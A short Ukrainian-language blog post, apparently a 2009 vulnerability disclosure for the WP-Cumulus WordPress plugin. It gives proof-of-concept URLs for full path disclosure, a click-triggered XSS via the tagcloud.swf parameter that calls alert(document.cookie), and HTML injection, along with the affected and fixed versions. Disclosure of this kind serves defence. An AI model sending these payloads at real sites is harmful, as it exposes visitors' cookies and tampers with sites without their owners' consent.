Уразливості в WP-Cumulus для WordPress

23:58 09.11.2009

У березні, 15.03.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в плагіні WP-Cumulus для WordPress. Про що найближчим часом повідомлю розробникам.

Дірки я виявив на http://glaive.org.ua - сайті Glaive Security Group. І як я виявив нещодавно, хлопці явно зрозуміли, що не потрібно “страждати дірявістю” з дірявим WordPress та дірявими плагінами до нього, і прибрали WP зі свого сайта ;-) .

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі WP-Cumulus 1.22 та попередні версії. В версії 1.23 розробником була виправлена XSS, але не HTML Injection.


Leave a Reply

You must be logged in to post a comment.